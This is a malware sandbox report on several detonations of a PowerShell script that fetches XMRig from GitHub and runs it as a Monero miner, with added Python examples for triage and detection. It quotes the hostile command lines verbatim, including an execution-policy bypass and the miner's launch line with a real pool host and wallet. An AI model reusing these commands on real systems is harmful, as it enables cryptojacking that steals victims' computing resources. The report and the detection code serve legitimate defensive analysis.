| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2928-91-0x00000239274D0000-0x00000239274F0000-memory.dmp
memory/2928-92-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2324-94-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp
memory/2928-93-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2324-95-0x00007FFF7A123000-0x00007FFF7A124000-memory.dmp
memory/2324-96-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp
memory/2928-{97..157}-0x00007FF708190000-0x00007FF708DC3000-memory.dmp (61 consecutive dumps of the same region)
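The memory-dump listing above is dominated by one region of PID 2928 (the dropped xmrig.exe) being dumped again and again at the same address range, while the PowerShell host (PID 2324) shows a handful of smaller regions. The following is an added example, not part of the original report or of the sandbox's own tooling: it parses dump names of the form memory/PID-index-0xSTART-0xEND-memory.dmp, groups them by region, computes each region's size, and compares the largest region of the miner process across the four runs on this page. The sample names are a subset copied from this page (PIDs 2324 and 2928 from this run; the xmrig regions of PIDs 4788, 3760 and 184 from the three runs that follow); which region corresponds to which mapping is not stated by the report, so the comparison only shows that the miner's largest region has the same size in every run at a different base, which is consistent with one binary (identical hashes in every run) mapped at ASLR-randomised addresses.

```python
"""Inventory of the memory-dump artefacts listed in a sandbox report.

Added example; not part of the original report or of the sandbox's own code.
Names follow the report's pattern memory/<pid>-<index>-0x<start>-0x<end>-memory.dmp.
"""
from __future__ import annotations

import re
from collections import defaultdict

DUMP_NAME = re.compile(r"memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp")

# Constructed subset of the report's Files listings (copied verbatim from the page).
DUMPS = [
    "memory/2324-3-0x00007FFF7A123000-0x00007FFF7A124000-memory.dmp",
    "memory/2324-8-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp",
    "memory/2324-10-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp",
    "memory/2928-91-0x00000239274D0000-0x00000239274F0000-memory.dmp",
    "memory/2928-92-0x00007FF708190000-0x00007FF708DC3000-memory.dmp",
    "memory/2928-93-0x00007FF708190000-0x00007FF708DC3000-memory.dmp",
    "memory/2928-97-0x00007FF708190000-0x00007FF708DC3000-memory.dmp",
    "memory/2928-157-0x00007FF708190000-0x00007FF708DC3000-memory.dmp",
    # largest xmrig.exe region in the other three runs (different base each time)
    "memory/4788-48-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp",
    "memory/3760-49-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp",
    "memory/184-49-0x00007FF7DBD40000-0x00007FF7DC973000-memory.dmp",
]


def parse_dump(name: str) -> tuple[int, int, int, int] | None:
    """Return (pid, index, start, end) or None for a name that is not a dump."""
    m = DUMP_NAME.fullmatch(name)
    if not m:
        return None
    pid, idx, start, end = m.groups()
    return int(pid), int(idx), int(start, 16), int(end, 16)


def inventory(names: list[str]) -> dict:
    """Group dumps by (pid, start, end); record region size and how often it was dumped."""
    regions = defaultdict(lambda: {"count": 0, "indices": [], "size": 0})
    for n in names:
        parsed = parse_dump(n)
        if parsed is None:
            continue
        pid, idx, start, end = parsed
        entry = regions[(pid, start, end)]
        entry["count"] += 1
        entry["indices"].append(idx)
        entry["size"] = end - start
    return dict(regions)


def largest_region_size(inv: dict, pid: int) -> int:
    """Size in bytes of the biggest region dumped for one PID (0 if none)."""
    sizes = [v["size"] for (p, _, _), v in inv.items() if p == pid]
    return max(sizes) if sizes else 0


def shared_image_sizes(inv: dict, pids: list[int]) -> set[int]:
    """Largest-region sizes across several PIDs. One value for several runs means the
    same-sized mapping appeared at different bases, which is what ASLR does to one binary."""
    return {largest_region_size(inv, p) for p in pids}


def page_aligned(inv: dict) -> bool:
    """Sanity check: every dumped region should start and end on a 4 KiB page boundary."""
    return all(s % 0x1000 == 0 and e % 0x1000 == 0 for (_, s, e) in inv)


if __name__ == "__main__":
    inv = inventory(DUMPS)
    for (pid, start, end), v in sorted(inv.items()):
        print(f"PID {pid:5d} 0x{start:016X}-0x{end:016X} {v['size'] / 2**20:6.2f} MiB x{v['count']}")
    print("xmrig largest-region sizes across runs:",
          {hex(s) for s in shared_image_sizes(inv, [2928, 4788, 3760, 184])})
```

The same region of PID 2928 recurring with rising indices is the sandbox re-dumping the miner's mapping each time a signature fired on it, not new allocations; a forensic triage only needs one copy of that range plus the small heap regions that differ.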
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:47
Platform
win11-20240419-en
Max time kernel
1789s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(64 rows, all N/A)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 124 wrote to memory of 4788 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 124 wrote to memory of 4788 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
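The two process records above, read together with the "PID 124 wrote to memory of 4788" rows under Suspicious use of WriteProcessMemory, give the whole chain: powershell.exe started with -ExecutionPolicy bypass runs a .ps1 from the user's Temp directory and creates xmrig.exe with a Stratum pool (-o host:port) and a Monero wallet (-u) on its command line (a parent writing into a freshly created child is how CreateProcess looks from the sandbox's side). The following is an added example, not code from the original report or from any tool it names, that turns those rows into a detection: it rebuilds parent/child pairs from the signature text, recognises the weakened execution policy, extracts pool and wallet from the child, and checks the wallet against the Monero address format (95 base58 characters starting with 4 or 8). The set of accepted -ExecutionPolicy abbreviations is an assumption of the example; the sample input is copied from this run.

```python
"""Process-chain triage: PowerShell with a weakened execution policy launching a
process that carries miner-style pool/wallet arguments.

Added example; not code from the original report or from any tool it names.
"""
from __future__ import annotations

import re

# Copied from the report's Processes section, keyed by PID.
PROCESSES = {
    124: r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"',
    4788: r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 '
          r'-u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF',
}
# Copied from the WriteProcessMemory signature rows (CreateProcess as the sandbox sees it).
WRITE_EVENTS = ["PID 124 wrote to memory of 4788", "PID 124 wrote to memory of 4788"]

# Monero primary (4...) and subaddress (8...) wallets: 95 base58 chars, no 0, O, I, l.
MONERO_ADDR = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")
# Assumed spellings of -ExecutionPolicy (PowerShell accepts unambiguous prefixes).
EXECPOLICY_FLAGS = {"-executionpolicy", "-exec", "-ex", "-ep"}
WEAK_POLICIES = {"bypass", "unrestricted"}


def tokenize(cmdline: str) -> list[str]:
    """Split on whitespace but keep double-quoted paths (with spaces) as one token."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def image_name(tokens: list[str]) -> str:
    """Lower-cased file name of the executable token."""
    return tokens[0].rsplit("\\", 1)[-1].lower() if tokens else ""


def powershell_bypass(cmdline: str) -> str | None:
    """If this is a PowerShell host run with a weak execution policy, return its -File
    argument ("" when the policy is weakened but no script file is given); else None."""
    toks = tokenize(cmdline)
    if image_name(toks) not in {"powershell.exe", "pwsh.exe"}:
        return None
    low = [t.lower() for t in toks]
    weakened = any(low[i] in EXECPOLICY_FLAGS and low[i + 1] in WEAK_POLICIES
                   for i in range(len(low) - 1))
    if not weakened:
        return None
    for i in range(len(low) - 1):
        if low[i] in {"-file", "-f"}:
            return toks[i + 1]
    return ""


def stratum_args(cmdline: str) -> dict | None:
    """Pull pool host:port (-o/--url) and wallet (-u/--user) out of a miner-style command line."""
    toks = tokenize(cmdline)
    pool = wallet = None
    for i in range(len(toks) - 1):
        if toks[i] in {"-o", "--url"}:
            host, _, port = toks[i + 1].split("://")[-1].rpartition(":")  # drop stratum+tcp://
            if host and port.isdigit():
                pool = (host, int(port))
        elif toks[i] in {"-u", "--user"}:
            wallet = toks[i + 1]
    if pool is None and wallet is None:
        return None
    return {"pool": pool, "wallet": wallet,
            "wallet_is_monero": bool(wallet and MONERO_ADDR.match(wallet))}


def parent_child_pairs(events: list[str]) -> set[tuple[int, int]]:
    """Recover (parent, child) PIDs from 'PID a wrote to memory of b' signature rows."""
    pairs = set()
    for e in events:
        m = re.fullmatch(r"PID (\d+) wrote to memory of (\d+)", e)
        if m:
            pairs.add((int(m[1]), int(m[2])))
    return pairs


def triage(processes: dict[int, str], events: list[str]) -> list[dict]:
    """Flag each weak-policy PowerShell parent whose child carries pool/wallet arguments."""
    findings = []
    for parent, child in sorted(parent_child_pairs(events)):
        script = powershell_bypass(processes.get(parent, ""))
        miner = stratum_args(processes.get(child, ""))
        if script is not None and miner is not None:
            findings.append({"parent_pid": parent, "child_pid": child, "script": script,
                             "miner_image": tokenize(processes[child])[0], **miner})
    return findings


if __name__ == "__main__":
    for f in triage(PROCESSES, WRITE_EVENTS):
        print(f"PID {f['parent_pid']} ran {f['script']!r} -> PID {f['child_pid']} {f['miner_image']}")
        print(f"  pool {f['pool'][0]}:{f['pool'][1]}, Monero wallet format: {f['wallet_is_monero']}")
```

The parent/child relation is taken from the signature text rather than from a process tree because that is all this report exposes; on a live host the same logic applies to Sysmon event 1 (ParentCommandLine and CommandLine) without the WriteProcessMemory detour.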
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/124-0-0x00007FFE6B1F3000-0x00007FFE6B1F5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4bzpi0jg.ipa.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/124-9-0x0000017254690000-0x00000172546B2000-memory.dmp
memory/124-10-0x00007FFE6B1F0000-0x00007FFE6BCB2000-memory.dmp
memory/124-11-0x00007FFE6B1F0000-0x00007FFE6BCB2000-memory.dmp
memory/124-12-0x00007FFE6B1F0000-0x00007FFE6BCB2000-memory.dmp
memory/124-14-0x0000017254720000-0x0000017254732000-memory.dmp
memory/124-15-0x0000017254710000-0x000001725471A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4788-46-0x000002B7B2E20000-0x000002B7B2E40000-memory.dmp
memory/4788-47-0x000002B7B2E70000-0x000002B7B2E90000-memory.dmp
memory/4788-48-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/124-49-0x00007FFE6B1F3000-0x00007FFE6B1F5000-memory.dmp
memory/4788-51-0x000002B7B2E90000-0x000002B7B2EB0000-memory.dmp
memory/124-50-0x00007FFE6B1F0000-0x00007FFE6BCB2000-memory.dmp
memory/4788-52-0x000002B7B4760000-0x000002B7B4780000-memory.dmp
memory/4788-53-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-54-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-55-0x000002B7B2E90000-0x000002B7B2EB0000-memory.dmp
memory/4788-57-0x000002B7B4760000-0x000002B7B4780000-memory.dmp
memory/4788-56-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-{58..116}-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp (59 consecutive dumps of the same region)
Analysis: behavioral19
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:59
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(64 rows, all N/A)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4660 wrote to memory of 3760 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4660 wrote to memory of 3760 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4236,i,1067197275908310731,12785105794523264014,262144 --variations-seed-version --mojo-platform-channel-handle=3852 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3912,i,1067197275908310731,12785105794523264014,262144 --variations-seed-version --mojo-platform-channel-handle=4132 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.111.78.13.in-addr.arpa | udp |
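The Network table above mixes three different things: reverse lookups (*.in-addr.arpa) that the sandbox itself performs for every peer address it observed, the HTTPS fetch of the xmrig release from GitHub infrastructure (github.com, objects.githubusercontent.com), and the TCP session to gulf.moneroocean.stream on the non-web port 10128 that matches the -o argument on the miner's command line. The following is an added example, not part of the original report, that parses the table and sorts the rows so that only the pool endpoint ends up on the block list. The table text is copied from this run; treating the two GitHub names as staging rather than attacker-controlled infrastructure is an editorial assumption of the example.

```python
"""Sort a sandbox Network table into resolver noise, lookups, staging and pool traffic.

Added example; not part of the original report or of the sandbox's own tooling.
"""
from __future__ import annotations

import re

# Copied from the report (behavioral19 run), header row included.
NETWORK_TABLE = """
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.111.78.13.in-addr.arpa | udp |
"""

ROW = re.compile(r"^\|\s*(\w+)\s*\|\s*([\d.]+):(\d+)\s*\|\s*(\S+)\s*\|\s*(tcp|udp)\s*\|$")
CODE_HOSTING = {"github.com", "objects.githubusercontent.com"}  # assumed staging, not C2
WEB_PORTS = {80, 443}


def parse_rows(table: str) -> list[dict]:
    """Parse '| CC | ip:port | domain | proto |' rows; the header and malformed lines are skipped."""
    rows = []
    for line in table.strip().splitlines():
        m = ROW.match(line.strip())
        if m:
            cc, ip, port, domain, proto = m.groups()
            rows.append({"cc": cc, "ip": ip, "port": int(port), "domain": domain, "proto": proto})
    return rows


def classify(table: str) -> dict:
    """Bucket each row: sandbox reverse-DNS noise, forward lookups, staging fetches, pool sessions."""
    out = {"reverse_dns_noise": 0, "lookups": [], "staging": [], "pool": [], "other": []}
    for r in parse_rows(table):
        endpoint = f'{r["ip"]}:{r["port"]} ({r["domain"]})'
        if r["domain"].endswith(".in-addr.arpa"):
            out["reverse_dns_noise"] += 1                # the sandbox naming peers it saw
        elif r["proto"] == "udp" and r["port"] == 53:
            out["lookups"].append(r["domain"])           # names the sample itself resolved
        elif r["domain"] in CODE_HOSTING and r["port"] in WEB_PORTS:
            out["staging"].append(endpoint)              # payload download over HTTPS
        elif r["proto"] == "tcp" and r["port"] not in WEB_PORTS:
            out["pool"].append(endpoint)                 # Stratum to a non-web port
        else:
            out["other"].append(endpoint)
    return out


def block_list(result: dict) -> list[str]:
    """Indicators worth blocking: the pool's name and IP:port, never the code-hosting CDN."""
    iocs = set()
    for ep in result["pool"]:
        ipport, _, name = ep.partition(" (")
        iocs.add(ipport)
        iocs.add(name.rstrip(")"))
    return sorted(iocs)


if __name__ == "__main__":
    res = classify(NETWORK_TABLE)
    print(f"{res['reverse_dns_noise']} reverse-DNS rows dropped; lookups: {res['lookups']}")
    print("staging:", res["staging"])
    print("pool:", res["pool"])
    print("block:", block_list(res))
```

Blocking github.com because it appears in a miner's traffic would break far more than it protects; the durable indicators here are the pool hostname and the IP:port, and the same classification applies to the behavioral4 and behavioral27 tables on this page, which resolve the pool to the same 149.102.143.109:10128.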
Files
memory/4660-0-0x00007FFBF90F3000-0x00007FFBF90F5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4rb3t3ut.55z.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4660-10-0x00000245BF720000-0x00000245BF742000-memory.dmp
memory/4660-11-0x00007FFBF90F0000-0x00007FFBF9BB1000-memory.dmp
memory/4660-12-0x00007FFBF90F0000-0x00007FFBF9BB1000-memory.dmp
memory/4660-14-0x00007FFBF90F0000-0x00007FFBF9BB1000-memory.dmp
memory/4660-15-0x00000245C1940000-0x00000245C1952000-memory.dmp
memory/4660-16-0x00000245BF710000-0x00000245BF71A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3760-47-0x00000270B4FE0000-0x00000270B5000000-memory.dmp
memory/3760-48-0x00000270B5030000-0x00000270B5050000-memory.dmp
memory/3760-49-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-52-0x00000270B5050000-0x00000270B5070000-memory.dmp
memory/4660-51-0x00007FFBF90F3000-0x00007FFBF90F5000-memory.dmp
memory/3760-50-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/4660-53-0x00007FFBF90F0000-0x00007FFBF9BB1000-memory.dmp
memory/3760-54-0x00000270B5080000-0x00000270B50A0000-memory.dmp
memory/3760-55-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-56-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp
memory/3760-57-0x00000270B5050000-0x00000270B5070000-memory.dmp
memory/3760-58-0x00000270B5080000-0x00000270B50A0000-memory.dmp
memory/3760-{59..117}-0x00007FF67C190000-0x00007FF67CDC3000-memory.dmp (59 consecutive dumps of the same region)
Analysis: behavioral27
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:20
Platform
win10v2004-20240508-en
Max time kernel
1799s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(64 rows, all N/A)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2484 wrote to memory of 184 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2484 wrote to memory of 184 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
